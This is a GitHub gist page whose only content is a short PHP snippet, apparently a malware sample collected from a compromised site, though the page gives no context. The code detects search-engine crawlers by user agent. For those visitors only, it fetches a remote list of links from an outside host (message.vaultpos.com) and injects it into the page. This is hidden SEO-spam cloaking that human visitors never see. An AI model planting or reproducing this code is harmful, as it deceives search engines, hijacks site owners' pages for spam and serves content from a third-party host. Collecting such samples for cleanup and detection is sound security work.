Skip to content

Instantly share code, notes, and snippets.

@PalmaSolutions
Created September 16, 2017 10:20
Show Gist options
  • Save PalmaSolutions/e4839cf9da1758274f84c7e1abdcdf6b to your computer and use it in GitHub Desktop.
Save PalmaSolutions/e4839cf9da1758274f84c7e1abdcdf6b to your computer and use it in GitHub Desktop.
<?php
if(preg_match('/Google Web Preview|bot|spider|wget/i',$_SERVER['HTTP_USER_AGENT'])){
$ch = curl_init();
$timeout = 5;
curl_setopt ($ch, CURLOPT_URL, 'http://message.vaultpos.com/2017alllinks02-1.txt');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
echo $file_contents;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment